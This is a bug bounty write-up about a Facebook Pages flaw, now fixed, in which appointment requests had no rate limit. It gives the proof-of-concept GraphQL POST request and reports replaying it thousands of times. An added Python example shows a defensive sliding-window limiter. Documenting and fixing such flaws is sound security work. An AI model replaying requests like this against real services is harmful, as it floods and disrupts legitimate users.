[Facebook] Disable Service Appointments

An attacker could have abused a missing rate limit on requesting Appointments for a Service created by a Page, flooding the Page with bogus requests and hiding the legitimate Appointments.

POC -

A Batch GraphQL request going to -

=======================================================================

POST /api/graphqlbatch/?dpr=1 HTTP/1.1

Host: facebook.com

queries={"o0":{"doc_id":"1407026786058467","query_params":{"input":{"actor_id":XXX,"client_mutation_id":"005f85b8-8f4e-4fe5-bc15-4b49dc2f5cd7","page_id":XXX,"action":"request","service_id":"XXX","availability":"Test","consumer_name":null,"general_info":"","more_info":"Test","referrer":"service_menu","referrer_surface":"page","prior_referrer":null,"prior_referrer_surface":null,"session_id":"c1a2ecb170634f5f4194885db84d5fd6"}}}}

=======================================================================

had no rate limit applied.

By repeating this request, the genuine Appointments would be buried among the bogus ones and hidden from Page owners.

Rate limit evaluation -

We could have sent 4000 requests in just less than 2 minutes and we were not getting blocked after the 4001st request. I used almost 5000 POST requests and was not getting blocked.
The responses to these requests had an error. But in the UI the requests were being sent successfully. We were not getting silently blocked.
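The following is an added example, not Facebook's code and not from the original report: a server-side sliding-window limiter applied to the appointment-request mutation, keyed on the (actor_id, page_id) pair so one account cannot bury a single Page's inbox. The threshold of 20 requests per 10 minutes, the batch payload values and the replay pacing (4000 requests in 100 seconds, matching the report) are all assumptions or constructed sample data; the rejection is returned as an explicit GraphQL error rather than a silent drop, so a client has something to surface instead of showing the request as sent.

```python
import json
from collections import deque

# Assumed policy values (not Facebook's real thresholds): at most MAX_REQUESTS
# appointment requests per (actor, page) pair within any WINDOW_SECONDS span.
MAX_REQUESTS = 20
WINDOW_SECONDS = 600.0

# Constructed sample batch payload in the shape of the PoC's "queries" field.
# actor_id, page_id and service_id are placeholder values, not real identifiers.
SAMPLE_QUERIES = json.dumps({
    "o0": {
        "doc_id": "1407026786058467",
        "query_params": {"input": {
            "actor_id": "100000000000001",
            "page_id": "200000000000002",
            "action": "request",
            "service_id": "300000000000003",
            "availability": "Test",
            "more_info": "Test",
            "referrer": "service_menu",
        }},
    }
})


class SlidingWindowLimiter:
    """Per-key sliding-window counter. Timestamps are passed in explicitly so
    the behaviour can be replayed deterministically."""

    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._hits = {}

    def allow(self, key, now):
        hits = self._hits.setdefault(key, deque())
        cutoff = now - self.window_seconds
        # Drop timestamps that have aged out of the window.
        while hits and hits[0] <= cutoff:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False
        hits.append(now)
        return True


def extract_inputs(queries_json):
    """Pull the mutation input dict out of every query in a graphqlbatch payload."""
    batch = json.loads(queries_json)
    return [q["query_params"]["input"] for q in batch.values()]


def handle_appointment_request(mutation_input, limiter, now):
    """Apply the limiter before touching appointment state."""
    key = (mutation_input["actor_id"], mutation_input["page_id"])
    if not limiter.allow(key, now):
        # Explicit, non-silent rejection the client can surface to the user.
        return {"data": None,
                "errors": [{"code": "RATE_LIMITED",
                            "message": "too many appointment requests, retry later"}]}
    return {"data": {"appointment_request": {"status": "requested"}}, "errors": None}


def replay_burst(queries_json, count, interval_seconds, limiter=None):
    """Replay the same batch payload `count` times, `interval_seconds` apart,
    and return (accepted, rejected) counts."""
    limiter = limiter or SlidingWindowLimiter(MAX_REQUESTS, WINDOW_SECONDS)
    accepted = rejected = 0
    for i in range(count):
        now = i * interval_seconds
        for mutation_input in extract_inputs(queries_json):
            result = handle_appointment_request(mutation_input, limiter, now)
            if result["errors"]:
                rejected += 1
            else:
                accepted += 1
    return accepted, rejected


if __name__ == "__main__":
    # 4000 requests in 100 seconds, the pace described in the report.
    print(replay_burst(SAMPLE_QUERIES, 4000, 0.025))  # → (20, 3980)
```

Keying on the actor alone would let one account spread the flood across many Pages; keying on the Page alone would let a few hostile accounts lock out genuine customers of a busy Page. A per-pair limit plus a looser per-actor ceiling is the usual combination, and the limiter state would live in a shared store (not a process-local dict) in a real deployment.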

Timeline -

Reported - Monday, October 29, 2018

Triaged - Wednesday, December 5, 2018

Fixed - Wednesday, February 13, 2019 

Rewarded - Monday, February 18, 2019
